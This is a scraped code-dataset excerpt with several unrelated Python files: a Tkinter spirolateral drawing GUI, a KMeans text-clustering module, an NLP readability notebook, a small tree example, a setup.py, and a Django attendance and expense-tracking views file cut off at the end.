anchor=NW, text=\"Angle:\")\n        angel_label.grid(row=3, column=0, sticky=NW,\n                         padx=self.PX, pady=self.PY)\n\n        self.ang_ent = Entry(\n            self.__inputframe, validate='key', validatecommand=self.vcmd)\n        self.ang_ent.grid(row=3, column=1, sticky=NW,\n                          padx=self.PX, pady=self.PY)\n\n        self.create_person_btn = Button(self.__inputframe, width=10,\n                                        text=\"Enter Data\",\n                                        command=self.make_spiro)\n        self.create_person_btn.grid(row=5, columnspan=2, pady=15)\n        self.errorLabel = Label(self.__inputframe, text=\"\")\n        self.errorLabel.grid(row=6, columnspan=2)\n\n    def validate_int(self, action, index, value_if_allowed,\n                     prior_value, text, validation_type, trigger_type,\n                     widget_name):\n        '''\n        Integer validation for entry boxes.\n        '''\n        if action == '1':\n            if text in '0123456789-+':\n                try:\n                    int(value_if_allowed)\n                    return True\n                except ValueError:\n                    return False\n            else:\n                return False\n        else:\n            return True\n\n    def inputGrid(self):\n        \"\"\" Switches from the displaying frame to the collecting (input) frame. \"\"\"\n        self.__homeframe.grid_forget()\n        self.__inputframe.grid_propagate(0)\n        self.__inputframe.grid(row=0, column=0, sticky=\"nsew\")\n\n    def homeGrid(self):\n        \"\"\" Switches back to the displaying frame and refreshes its contents. \"\"\"\n        self.__inputframe.grid_forget()\n        self.__homeframe.grid_propagate(0)\n        self.__homeframe.grid(row=0, column=0, sticky=\"nsew\")\n\n        if len(self.spirolateralist) > 0:\n            self.show_data()\n            self.mobile_info.configure(\n                text=\"\")\n        else:\n            self.mobile_info.configure(\n                text=\"There is not currently any data to show\")\n\n    def make_spiro(self):\n        '''Creates a spirolateral object'''\n        if \"\" in {self.spiro_name_entry.get(),\n                  self.seg_ent.get(), self.ang_ent.get()}:\n\n            self.errorLabel.configure(text=\"There is no data entered.\")\n        else:\n            self.errorLabel.configure(text=\"\")\n            spiroClass = Spirolateral(self.spiro_name_entry.get(\n            ), self.seg_ent.get(), self.ang_ent.get())\n            self.spirolateralist.append(spiroClass)\n            self.clear()\n            if len(self.spirolateralist) > 1:\n                self.next_btn.configure(state=NORMAL)\n\n    def clear(self):\n        \"\"\" Clears entries and selections in input frame. \"\"\"\n        self.spiro_name_entry.delete(0, END)\n        self.seg_ent.delete(0, END)\n        self.ang_ent.delete(0, END)\n\n    def next_person(self):\n        \"\"\" Increments self.__index and calls show_data method. Disables next\n        button if at the end of the list. Ensures prev button is normal.\"\"\"\n        self.__index += 1\n\n        if self.__index == len(self.spirolateralist)-1:\n            self.next_btn.configure(state=DISABLED)\n\n        self.prev_btn.configure(state=NORMAL)\n        self.show_data()\n\n    def previous(self):\n        \"\"\" Decrements self.__index and calls show_data method. Disables prev\n        button if at the start of the list. 
Ensures next button is normal.\"\"\"\n\n        self.__index -= 1\n        if self.__index == 0:\n            self.prev_btn.configure(state=DISABLED)\n\n        self.next_btn.configure(state=NORMAL)\n        self.show_data()\n\n    def show_data(self):\n        \"\"\" Configures the displaying frame to show the data associated with\n        the Spirolateral object stored at self.__index \"\"\"\n        self.first_name.configure(text=self.spirolateralist[self.__index].name)\n        self.age.configure(text=self.spirolateralist[self.__index].timestable)\n        self.angel.configure(text=\"{}°\".format(\n            self.spirolateralist[self.__index].angle))\n\n    def turtleSpiroDraw(self):\n        try:\n            self.mobile_info.configure(text=\"\")\n            angle = int(self.spirolateralist[self.__index].angle)\n            complete = False\n            self.spiroTurt.reset()  # clears any previous drawings\n\n            startPosx, startPosy = self.spiroTurt.pos()\n            startPos = (startPosx, startPosy)\n            self.spiroTurt.speed(-1)  # for maximum speed\n            self.spiroTurt.hideturtle()\n            cycles = 0\n            SCALE = 20\n            while not complete:\n                for distance in self.spirolateralist[self.__index].digitCalc():\n                    # range increases for more timestables\n                    print(distance)\n                    self.spiroTurt.left(180 - angle)\n                    # turns correctly to give the desired shape\n                    self.spiroTurt.forward(distance * SCALE)\n                    # increases the size of the spiro by a factor.\n\n                cycles += 1\n\n                currentPosx, currentPosy = self.spiroTurt.pos()\n                # grabs current pos\n                currentPos = (round(currentPosx, 3), round(currentPosy, 3))\n                print(\"Current cycle\", cycles)\n\n                if currentPos == startPos:\n                    print(\"We're done here\")\n                    complete = True\n        except Exception:\n            self.mobile_info.configure(\n                text=\"There is not currently any data to draw!\")\n\n\nif __name__ == \"__main__\":\n    # Executes when the file itself is run, not when imported.\n    root = Tk()\n    app = Application(root)\n    app.mainloop()\n","repo_name":"EthanJohns02/Spirolateral","sub_path":"SpiroGUI.py","file_name":"SpiroGUI.py","file_ext":"py","file_size_in_byte":12907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17390259584","text":"from sklearn.cluster import KMeans\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.metrics.pairwise import euclidean_distances\nimport numpy as np\nimport pickle\nimport pandas as pd\nimport torch\nfrom typing import Tuple, List, Optional\n\nfrom abc import ABC, abstractmethod\n\nfrom src.data import BaseData, VectorizedData\nfrom src.summary import summarize\n\n\nclass Cluster:\n    def __init__(\n        self, cluster_id: int, center, chunks: List[str], embeddings: torch.Tensor\n    ) -> None:\n        self.cluster_id = cluster_id\n        self.center = center\n        self.chunks = chunks\n        self.embeddings = embeddings\n\n        self.summary = None\n\n    def get_summary(self):\n        if self.summary is None:\n            self.summary = summarize(\" \".join(self.chunks[:3]))\n        return self.summary\n\n\nclass Clusterizator(ABC):\n    def __init__(self, vectorized_data: VectorizedData) -> None:\n        self.vectorized_data = vectorized_data\n        self.chunks = self.vectorized_data.get_chunks()\n        self.embeddings = self.vectorized_data.get_embeddings()\n        self.clusters = {}\n\n    def clusterize(\n        self,\n        num_clusters: Optional[int] = None,\n        embeddings: Optional[np.ndarray] = None,\n    ):\n        if embeddings is None:\n            embeddings = self.embeddings\n\n        # Argument order matches the _clusterize implementations below.\n        self._clusterize(num_clusters, embeddings)\n        self._set_clusters()\n\n    def _set_clusters(self):\n        for cluster_id, center in enumerate(self.get_clusters_centers()):\n            cluster_chunks, 
cluster_vectors = self.get_vectors_by_cluster_id(cluster_id)\n            cluster = Cluster(cluster_id, center, cluster_chunks, cluster_vectors)\n\n            self.clusters[cluster_id] = cluster\n\n    def get_cluster_by_id(self, cluster_id) -> Cluster:\n        return self.clusters[cluster_id]\n\n    def get_cluster_summaries(self):\n        summaries = {}\n        for cluster_id, cluster in self.clusters.items():\n            summaries[cluster_id] = cluster.get_summary()\n        return summaries\n\n    @abstractmethod\n    def _clusterize(self, num_clusters: Optional[int], embeddings: np.ndarray):\n        ...\n\n    @abstractmethod\n    def get_clusters_centers(self) -> np.ndarray:\n        ...\n\n    @abstractmethod\n    def get_vectors_by_cluster_id(self, cluster_id, top_k=None):\n        ...\n\n    def get_samples(self, top_k=3):\n        samples = []\n        for cluster_id, center in enumerate(self.get_clusters_centers()):\n            sample_cluster = self.get_vectors_by_cluster_id(cluster_id, top_k=top_k)\n            samples.append(sample_cluster)\n        return samples\n\n\nclass KMeansClusterizator(Clusterizator):\n    def determine_k(self, embeddings):\n        k_min = 10\n        clusters = [x for x in range(2, k_min * 11)]\n        metrics = []\n        for i in clusters:\n            metrics.append((KMeans(n_clusters=i, n_init=10).fit(embeddings)).inertia_)\n\n        k = self.elbow(k_min, clusters, metrics)\n        return k\n\n    def elbow(self, k_min, clusters, metrics):\n        score = []\n\n        for i in range(k_min, clusters[-3]):\n            y1 = np.array(metrics)[: i + 1]\n            y2 = np.array(metrics)[i:]\n\n            df1 = pd.DataFrame({\"x\": clusters[: i + 1], \"y\": y1})\n            df2 = pd.DataFrame({\"x\": clusters[i:], \"y\": y2})\n\n            reg1 = LinearRegression().fit(np.asarray(df1.x).reshape(-1, 1), df1.y)\n            reg2 = LinearRegression().fit(np.asarray(df2.x).reshape(-1, 1), df2.y)\n\n            y1_pred = reg1.predict(np.asarray(df1.x).reshape(-1, 1))\n            y2_pred = reg2.predict(np.asarray(df2.x).reshape(-1, 1))\n\n            score.append(\n                mean_squared_error(y1, y1_pred) + mean_squared_error(y2, y2_pred)\n            )\n\n        return np.argmin(score) + k_min\n\n    def _clusterize(self, num_clusters: Optional[int], embeddings: np.ndarray):\n        if num_clusters is None:\n            num_clusters = self.determine_k(embeddings)\n\n        self.kmeans = KMeans(n_clusters=num_clusters, random_state=42).fit(embeddings)\n        self.kmeans_labels = self.kmeans.labels_\n\n    def get_clusters_centers(self) -> np.ndarray:\n        return self.kmeans.cluster_centers_\n\n    def get_vectors_by_cluster_id(\n        self, cluster_id: int, top_k: Optional[int] = None\n    ) -> Tuple[List[str], List[np.ndarray]]:\n        data = pd.DataFrame()\n        data[\"text\"] = self.chunks\n        data[\"label\"] = self.kmeans_labels\n        data[\"embedding\"] = list(self.embeddings)\n\n        kmeans_centers = self.get_clusters_centers()\n\n        cluster = data[data[\"label\"].eq(cluster_id)]\n        embeddings = list(cluster[\"embedding\"])\n        texts = list(cluster[\"text\"])\n        # Similarity of each chunk embedding to this cluster's own center.\n        similarities = [\n            cosine_similarity(kmeans_centers[cluster_id].reshape(1, -1), e.reshape(1, -1))[0][0]\n            for e in embeddings\n        ]\n        scores = list(zip(texts, similarities))\n\n        if top_k is None:\n            top_k = len(scores)\n\n        top_k = min(len(scores), top_k)\n\n        # Highest cosine similarity first, i.e. the chunks closest to the center.\n        top = sorted(scores, key=lambda x: x[1], reverse=True)[:top_k]\n        top_texts = list(zip(*top))[0]\n        return top_texts, embeddings\n\n    def save(self, pth: str = \"data/clusters.pkl\"):\n        with open(pth, \"wb\") as model_file:\n            pickle.dump(self.kmeans, model_file)\n\n    def load(self, pth: str = \"data/clusters.pkl\"):\n        with open(pth, \"rb\") as model_file:\n            self.kmeans = pickle.load(model_file)\n            self.kmeans_labels = self.kmeans.labels_\n\n        self._set_clusters()\n\n\nclass DBSCANClusterizator(Clusterizator):\n    
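\"\"\"Placeholder for a density-based clusterer (not implemented yet).\"\"\"\n\n    # A minimal sketch of one possible implementation (an assumption, not the\n    # author's code): sklearn's DBSCAN infers the cluster count itself, so\n    # num_clusters would be ignored, and noise points are labelled -1.\n    #\n    #     def _clusterize(self, num_clusters, embeddings):\n    #         from sklearn.cluster import DBSCAN\n    #         self.dbscan = DBSCAN(eps=0.5, min_samples=5).fit(embeddings)\n    #         self.labels = self.dbscan.labels_\n    #\n    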
...\n","repo_name":"chega8/telegram_clustering","sub_path":"src/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":5560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74840922726","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nimport pickle\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\nfrom nlp import nlp as nlp\n\nLangProcessor = nlp()\n\n\n# %%\nwith open(\"anal.pickle\", \"rb\") as f:\n data = pickle.load(f)\n\n\ncorpus = []\ncols = []\n\nfor d in data:\n corpus.append(d['text'])\n\nfor d in data:\n cols.append(d['link']) \n\n\n# %%\nvectorizer = TfidfVectorizer(stop_words='english', ngram_range = (1,1), max_df = .6, min_df = .01, decode_error='ignore', strip_accents='unicode', analyzer='word',\n tokenizer=LangProcessor.tokenize)\n\n\n# %%\nX = vectorizer.fit_transform(corpus)\n\n\n# %%\nfeature_names = vectorizer.get_feature_names()\n\n\n# %%\ndense = X.todense()\ndenselist = dense.tolist()\ndf = pd.DataFrame(denselist, columns=feature_names)\ndf.head()\n\n\n# %%\ndat = df.transpose()\n\nrecs = []\n\n# Find the top 30 words written by each author\ntop_dict = {}\nfor c in range(0,len(cols)):\n top = dat.iloc[:,c].sort_values(ascending=False).head(30)\n top_dict[dat.columns[c]]= list(zip(top.index, top.values))# Print the top 15 words from each article\nfor p, top_words in top_dict.items():\n rec = {'link': cols[p]}\n index = 0\n for word, count in top_words[0:5]:\n rec[str(index)+\" term\"] = word\n rec[str(index)+\" termCounts\"] = count\n index = index+1\n\n stats = LangProcessor.stats(data[p]['text'])\n sentiment = LangProcessor.lang_senti(data[p]['text'])\n rec['standard'] = stats['standard']\n rec['lexCount'] = stats['lexicon count'] \n rec['flesch'] = stats['flesch_reading_ease']\n rec['pol'] = sentiment[0]\n rec['subjectivity'] = sentiment[1]\n recs.append(rec)\n\nprint(recs[0])\n\n\n# %%\nwith open(\"analytis.pickle\", \"wb\") as f:\n pickle.dump(recs, f, pickle.HIGHEST_PROTOCOL)\n\n\n# %%\ndataframe = pd.DataFrame(recs)\n\n\n# %%\ndataframe.head()\n\n\n# %%\ndataframe.info()\n\n\n# %%\nimport altair as alt\n\ngrades = {\n'10th and 11th grade': '4: 10th-11th',\n'11th and 12th grade': '5: 11th-12th',\n'12th and 13th grade': '6: 12th-13th',\n'13th and 14th grade': '7: 13th-14th',\n'14th and 15th grade': '8: 14th-15th',\n'15th and 16th grade': '9: 15th-16th',\n'16th and 17th grade': '10: 16th-17th', \n'17th and 18th grade': '11: > 17th', \n'18th and 19th grade': '11: > 17th', \n'19th and 20th grade': '11: > 17th', \n'20th and 21st grade': '11: > 17th', \n'21st and 22nd grade': '11: > 17th', \n'22nd and 23rd grade': '11: > 17th', \n'23rd and 24th grade': '11: > 17th', \n'24th and 25th grade': '11: > 17th', \n'25th and 26th grade': '11: > 17th', \n'26th and 27th grade': '11: > 17th',\n'27th and 28th grade': '11: > 17th', \n'28th and 29th grade': '11: > 17th',\n'29th and 30th grade': '11: > 17th',\n'30th and 31st grade': '11: > 17th', \n'31st and 32nd grade': '11: > 17th',\n'32nd and 33rd grade': '11: > 17th', \n'35th and 36th grade': '11: > 17th', \n'36th and 37th grade': '11: > 17th',\n'37th and 38th grade': '11: > 17th', \n'38th and 39th grade': '11: > 17th',\n'3rd and 4th grade': '1: 3rd-4th', \n'57th and 58th grade': '11: > 17th',\n'8th and 9th grade': '2: 8th-9th',\n'9th and 10th grade': '3: 9th-10th'}\n\ndef flesch(x):\n response = 'Extremely confusing'\n if x< 30:\n response = 'Very confusing'\n elif 
x>29 and x<50:\n response = 'Difficult'\n elif x>49 and x<60:\n response = 'Fairly Difficult'\n\n elif x>59 and x<70:\n response = 'Standard'\n\n elif x>69 and x<80:\n response = 'Fairly Easy'\n\n elif x>79 and x<90:\n response = 'Easy'\n\n elif x > 89:\n response = 'Very Easy'\n \n return response\n\n\ndataframe['ReadingDiff'] = dataframe.flesch.apply(lambda x: flesch(x))\n\nf = dataframe.groupby('standard').count()['link']\nf = f.reset_index()\nf.columns = ['Grade','Count']\n\nf['cat']= f.Grade.apply(lambda x: grades[x])\n\nf\n\n\n# %%\ndataframe['lexCount'].plot()\n\n\n# %%\np = (alt.\n Chart(dataframe).\n mark_circle(size=40).\n encode(x='pol',y='subjectivity').\n properties(height=200, width=400, title='objectivity versus polarity') \n \n)\n\np1Line = alt.Chart(dataframe).mark_rule(color='red').encode(y='mean(subjectivity):Q')\np2Line = alt.Chart(dataframe).mark_rule(color='red').encode(x='mean(pol):Q')\n\nline = pd.DataFrame({'x': [0,0], 'y': [0,1]})\np3Line = alt.Chart(line).mark_line(color='green').encode(x='x',y='y')\n\np3 = p+p1Line+p2Line+p3Line\n\n\n# %%\np1Line = alt.Chart(dataframe).mark_rule(color='red').encode(y='mean(flesch):Q')\np2Line = alt.Chart(dataframe).mark_rule(color='red').encode(x='mean(lexCount):Q')\n\np = (alt.\n Chart(dataframe).\n mark_circle(size=40).\n encode(x='lexCount', y='flesch').\n properties(height=200, width=400, title='Article length versus readability').\n interactive()\n\n)\n\np1 = p+p1Line+p2Line\n\n\n# %%\np2 = (alt.\n Chart(f).\n mark_bar().\n encode(x='cat',y='sum(Count):Q').\n properties(height=200, width=400, title='Standard reading score')\n)\n\np2asc = p2.encode(alt.X(field='cat', type='nominal', sort='y'))\n\np4 = (alt.\n Chart(dataframe).\n mark_bar().\n encode(x = 'ReadingDiff', y='count()').\n properties(height=200, width=400, title='Reading level')\n)\n\np4asc = p4.encode(alt.X(field='ReadingDiff', type='nominal', sort='y'))\n\n\n# %%\np1 & p2asc | (p3 & p4asc)\n\n\n# %%\nflesch(-9), flesch(109)\n\n\n# %%\n\n\n\n","repo_name":"CognitiveDave/nlp","sub_path":"npbook.py","file_name":"npbook.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"6229906889","text":"class TreeNode:\n def __init__(self, val):\n self.value = val\n self.left = None\n self.right = None\n\n\nroot = TreeNode(12)\nchild1 = TreeNode(11)\nchild2 = TreeNode(13)\n\nroot.left = child1\nroot.right = child2\n\nprint(root.left.value)\nprint(root.right.value)","repo_name":"kalyanchatterjee/zero","sub_path":"datastructures/trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25249382313","text":"import nose2\nimport os\nimport setuptools\n\n# Utility function to read the README file.\n# Used for the long_description. 
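# ---- Aside (re: flesch() in npbook.py above): the elif-ladder maps a Flesch
# reading-ease score onto labels with bin edges at 30/50/60/70/80/90; the initial
# 'Extremely confusing' default is unreachable. pandas expresses the same mapping
# declaratively; a sketch, not the notebook's own code:
import pandas as pd

FLESCH_BINS = [float('-inf'), 30, 50, 60, 70, 80, 90, float('inf')]
FLESCH_LABELS = ['Very confusing', 'Difficult', 'Fairly Difficult', 'Standard',
                 'Fairly Easy', 'Easy', 'Very Easy']

def flesch_labels(scores):
    return pd.cut(pd.Series(scores), bins=FLESCH_BINS, labels=FLESCH_LABELS, right=False)

# flesch_labels([-9, 65, 109]) yields 'Very confusing', 'Standard' and 'Very Easy'
# respectively, matching the notebook's flesch(-9) and flesch(109) checks.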
It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\n\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nsetuptools.setup(\n name=\"gae-discourse-client\",\n version=\"0.0.1\",\n author=\"Thomas Davids\",\n author_email=\"thomas@udacity.com\",\n description=(\"An API client for Discourse using the Google App Engine \"\n \"framework\"),\n license=\"MIT\",\n keywords=\"google appengine discourse api client\",\n url=\"https://github.com/udacity/gae-discourse-client\",\n packages=['gae_discourse_client', 'tests', 'functional_tests'],\n test_suite='nose2.collector.collector',\n entry_points={\n \"distutils.commands\": [\n \"test_functional = test_functional:FunctionalTests\"\n ],\n },\n long_description=read('README.md'),\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Topic :: Utilities\",\n \"License :: OSI Approved :: BSD License\",\n ],\n)\n","repo_name":"udacity/gae-discourse-client","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5241420593","text":"from django.http import HttpResponse\nfrom django.template import RequestContext\nfrom app_folder.models import syain_info\nfrom app_folder.models import project_work\nfrom app_folder.models import torihikisaki_list\nfrom app_folder.models import trans_info\nfrom app_folder.models import kintai_touroku_info\nfrom app_folder.models import project_uchiwake\nfrom django.db.models import Avg, Max, Min, Sum\nfrom django.template import loader\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views import generic\n#from xoxzo.cloudpy import XoxzoClient\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.signing import BadSignature, SignatureExpired, loads,dumps\nfrom django.http import HttpResponseBadRequest\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import redirect\nfrom django.template.loader import get_template\nfrom django.views import generic\nfrom .forms import CustomUserCreateForm\nfrom django.contrib.auth.views import LoginView\nfrom .forms import CustomLoginForm\nfrom . 
import utils\nimport urllib.request\n\nimport datetime\nimport calendar\nimport locale\nimport os\nimport secrets\n\n# Create your views here.\nimport webbrowser\n\nUser = get_user_model()\n\ndef index(request):\n template = loader.get_template('index.html')\n return HttpResponse(template.render( None, request))\n \ndef login(request):\n template = loader.get_template('registration/login.html')\n \n \n return HttpResponse(template.render( None, request))\n \ndef password(request):\n template = loader.get_template('registration/password_change.html')\n print('pass')\n return HttpResponse(template.render( None, request))\n \ndef passwordchange(request):\n template = loader.get_template('registration/password_change.html') \n id = request.POST.get('UserId','')\n passw =request.POST.get('Password','')\n passn =request.POST.get('APassword','')\n passk =request.POST.get('KPassword','')\n list = syain_info.objects.all()\n context = {}\n if(len(passn) < 8):\n context.update({\n 'shorterror': '新パスワードは8文字以上で入力してください',\n })\n \n if (passn != passk):\n context.update({\n 'kakuninerror': '新パスワード,確認パスワードが一致しません',\n })\n if (passn == passw):\n context.update({\n 'sameerror': '新パスワードと旧パスワードが同じです',\n })\n sameflg = False\n for i in range(len(list)):\n syaincd1=list[i].syaincd\n password1=list[i].password\n if (id != syaincd1 or passw != password1):\n continue \n sameflg = True \n if(passn == passk and passn != passw and len(passn) >= 8):\n p = syain_info.objects.filter(syaincd = syaincd1)\n print(p)\n p.update(password = passn)\n return render(request, 'registration/login.html')\n \n if not sameflg:\n context.update({\n 'matcherror': 'ユーザーidまたはパスワードが違います',\n })\n return render(request, 'registration/password_change.html', context)\n \ndef koutuhilist(request):\n template = loader.get_template('registration/koutuhi_itiran.html')\n id = request.session.get('User','')\n data = trans_info.objects.filter(syaincd = id)\n print(data)\n my_dict2 = {\n 'data': data\n }\n return render(request, 'registration/koutuhi_itiran.html', my_dict2)\n \ndef koutuhi(request):\n template = loader.get_template('registration/koutuhi.html')\n listtori = torihikisaki_list.objects.all()\n request.session['User'] = request.POST['User']\n request.session['Pass'] = request.POST['Pass']\n id = request.POST['User']\n passw = request.POST['Pass']\n \n list = syain_info.objects.all()\n secret_key = secrets.randbelow(10000)\n message = \"こちらはXOXZOです。あなたの暗証番号は %04d です\" % secret_key\n\n # APIを呼び出すための秘密鍵は、環境変数に保存されているものとします\n # SIDとTOKENは https://www.xoxzo.com/ からサインアップして入手してください\n sid = os.getenv('XOXZO_API_SID')\n auth_token = os.getenv('XOXZO_API_AUTH_TOKEN')\n\n # SMSの送信\n #xc = XoxzoClient(sid=sid, auth_token=auth_token)\n #result = xc.send_sms(message=message, recipient=\"+818050213916\", sender=\"XOXZO\")\n\n for i in range(len(list)):\n syaincd=list[i].syaincd\n password=list[i].password\n print(list[i].syaincd)\n print(list[i].password)\n if (id == syaincd and passw == password):\n context = {\n 'cus': listtori,\n 'user':id,\n }\n print('open')\n #url = \"https://amazon.co.jp\"\n #webbrowser.open(url)\n #breakpoint()\n return render(request, 'registration/koutuhi.html', context)\n context = {\n 'error': 'ユーザーIDまたはパスワードが違います',\n }\n return render(request, 'registration/login.html', context)\n \ndef koutuhisubmit(request):\n template = loader.get_template('registration/koutuhi.html')\n list = torihikisaki_list.objects.all()\n ida = request.session.get('User','')\n name = syain_info.objects.get(syaincd=ida).syainname\n torihiki = 
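# ---- Aside (re: passwordchange above): the view repeats three checks (minimum
# length 8, new == confirmation, new != old) and compares plaintext passwords
# pulled straight from syain_info; Django's built-in hashers
# (django.contrib.auth.hashers.make_password / check_password) would be the safer
# storage. A sketch of the validation alone, reusing the view's error keys:
def password_change_errors(old, new, confirm):
    errors = {}
    if len(new) < 8:
        errors['shorterror'] = 'New password must be at least 8 characters'
    if new != confirm:
        errors['kakuninerror'] = 'New password and confirmation do not match'
    if new == old:
        errors['sameerror'] = 'New and old passwords are identical'
    return errors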
request.POST.get('torihiki', '')\n\n if request.method == 'POST':\n tourokuno = request.POST.get('tourokuno', '')\n kbn = request.POST['tourokukbn']\n date = datetime.date.today()\n \n \n startdatelist = []\n enddatelist = []\n homonlist = []\n kamokulist = []\n syudanlist = []\n transportlist = []\n seikyulist = []\n count = 0\n seisan = request.POST['seisan']\n \n \n for i in range(len(request.POST.getlist('homonlist', None))):\n start = request.POST.getlist('startdatelist', None)[i]\n end = request.POST.getlist('enddatelist', None)[i]\n startstr = start[:4] + '-' + start[4:6] + '-' + start[6:]\n endstr = end[:4] + '-' + end[4:6] + '-' + end[6:]\n homon = request.POST.getlist('homonlist', None)[i]\n kamoku = request.POST.getlist('kamokulist', None)[i]\n syudan = request.POST.getlist('syudanlist', None)[i]\n transport = request.POST.getlist('transportlist', None)[i]\n seikyu = request.POST.getlist('seikyulist', None)[i]\n print(range(len(request.POST.getlist('homonlist', None))))\n print(i)\n startdatelist.append(startstr)\n enddatelist.append(endstr)\n homonlist.append(homon)\n kamokulist.append(kamoku)\n syudanlist.append(syudan)\n transportlist.append(transport)\n seikyulist.append(seikyu)\n\n tourokuid = '10' + str(trans_info.objects.count())\n\n \n if (kbn == '削除'):\n print('delete')\n b = trans_info.objects.filter(tourokuno = str(tourokuno))\n b.delete()\n if (kbn == '修正'):\n print('update')\n b = trans_info.objects.filter(tourokuno = str(tourokuno))\n b.update(tourokukbn = kbn,tourokudate = date,customname = torihiki,homon = homonlist[i],tourokuno = tourokuid,\n startdate = startdatelist[i], enddate = startdatelist[i],kamoku = kamokulist[i], \n syudan = syudanlist[i],transport = transportlist[i], k_seikyu = seikyulist[0], seisan_kbn = seisan)\n if (kbn == '登録'):\n print('set')\n b = trans_info(syaincd = ida,syainname = name,tourokukbn = kbn,customname = torihiki, tourokudate = date,\n homon = homonlist[i],tourokuno = tourokuid, startdate = startdatelist[i], enddate = startdatelist[i],\n kamoku = kamokulist[i], syudan = syudanlist[i],transport = transportlist[i], k_seikyu = seikyulist[0], \n seisan_kbn = seisan)\n b.save()\n cus = {\n 'cus': list,\n 'message': '処理が完了しました',\n }\n return render(request, 'registration/koutuhi.html', cus)\ndef appearrance(request):\n template = loader.get_template('registration/syukketsusentaku.html')\n return HttpResponse(template.render( None, request))\n\n\n# 一覧出力画面(年月選択前)\ndef output(request):\n template = loader.get_template('registration/output_ichiran.html')\n \n return HttpResponse(template.render( None, request))\n\n# 一覧出力画面(年月選択後)\ndef output2(request):\n \n datelist = []\n weeklist = []\n monthyear =request.POST['monthselect']\n year = monthyear[:4]\n month = monthyear[5:7]\n monthz = monthyear[5:6]\n ida = request.session.get('User','')\n\n # 選択月の0埋めを無効化\n month_range = calendar.monthrange(int(year), int(month))\n \n listf = kintai_touroku_info.objects.filter(ymd__month = month,syaincd = ida).order_by('ymd')\n listmmm = []\n listweek = []\n \n locale.setlocale(locale.LC_TIME, 'ja_JP.UTF-8')\n # 日数分ループ\n for i in range(1,month_range[1] + 1):\n listmmm.append(i)\n date = datetime.date(int(year), int(month),i)\n print(date.strftime('%a'))\n listweek.append(i)\n \n \n # DB格納日数分ループ\n for i in range(len(listf)):\n mmmm = listf[i].ymd.day\n listmmm[mmmm - 1] = listf[i] # DBのデータ格納\n \n\n # DB未格納箇所を日付型に変換\n for i in range(1,month_range[1] + 1):\n if i in listmmm:\n listmmm[i - 1] = str(year) + str(month) + str(format(i, '02'))\n listmmm[i - 1] = 
datetime.datetime.strptime(listmmm[i - 1], '%Y%m%d')\n\n # 休暇理由、届出種類を数値から日本語に変換\n for i in range(len(listf)):\n kanmaflg = False\n if (listf[i].holidayriyu == \"0\"):\n listf[i].holidayriyu = str(listf[i].holidayriyu)\n listf[i].holidayriyu = \"\"\n \n \n if (listf[i].todoke_tikoku == 0):\n listf[i].todoke_tikoku = str(listf[i].todoke_tikoku)\n listf[i].todoke_tikoku = \"\"\n \n if (listf[i].todoke_soutai == 0):\n listf[i].todoke_soutai = str(listf[i].todoke_soutai)\n listf[i].todoke_soutai = \"\"\n \n if (listf[i].todoke_midnight == 0):\n listf[i].todoke_midnight = str(listf[i].todoke_midnight)\n listf[i].todoke_midnight = \"\"\n \n if (listf[i].todoke_hayade == 0):\n listf[i].todoke_hayade = str(listf[i].todoke_hayade)\n listf[i].todoke_hayade = \"\"\n \n if (listf[i].todoke_irregular == 0):\n listf[i].todoke_irregular = str(listf[i].todoke_irregular)\n listf[i].todoke_irregular = \"\"\n \n if (listf[i].todoke_holiwork == 0):\n listf[i].todoke_holiwork = str(listf[i].todoke_holiwork)\n listf[i].todoke_holiwork = \"\"\n \n if (listf[i].todoke_tikoku == 1):\n listf[i].todoke_tikoku = str(listf[i].todoke_tikoku)\n listf[i].todoke_tikoku = \"遅刻\"\n kanmaflg = True\n if (listf[i].todoke_soutai == 1):\n listf[i].todoke_soutai = str(listf[i].todoke_soutai)\n if kanmaflg:\n listf[i].todoke_soutai = \",早退\"\n else:\n listf[i].todoke_soutai = \"早退\"\n kanmaflg = True\n \n if (listf[i].todoke_midnight == 1):\n listf[i].todoke_midnight = str(listf[i].todoke_midnight)\n if kanmaflg:\n listf[i].todoke_midnight = \",深夜\"\n else:\n listf[i].todoke_midnight = \"深夜\"\n kanmaflg = True\n \n if (listf[i].todoke_hayade == 1):\n listf[i].todoke_hayade = str(listf[i].todoke_hayade)\n if kanmaflg:\n listf[i].todoke_hayade = \",早出\"\n else:\n listf[i].todoke_hayade = \"早出\"\n kanmaflg = True\n \n if (listf[i].todoke_irregular == 1):\n listf[i].todoke_irregular = str(listf[i].todoke_irregular)\n if kanmaflg:\n listf[i].todoke_irregular = \",変則出勤\"\n else:\n listf[i].todoke_irregular = \"変則出勤\"\n kanmaflg = True\n \n if (listf[i].todoke_holiwork == 1):\n listf[i].todoke_holiwork = str(listf[i].todoke_holiwork)\n if kanmaflg:\n listf[i].todoke_holiwork = \",休日出勤\"\n else:\n listf[i].todoke_holiwork = \"休日出勤\"\n\n locale.setlocale(locale.LC_TIME, 'ja_JP.UTF-8')\n sumwork = float(0.0);\n overwork = float(0.0);\n resttime = float(0.0);\n \n for l in listf:\n sumwork = sumwork + float(l.worktime)\n overwork = overwork + float(l.overtime)\n resttime = resttime + 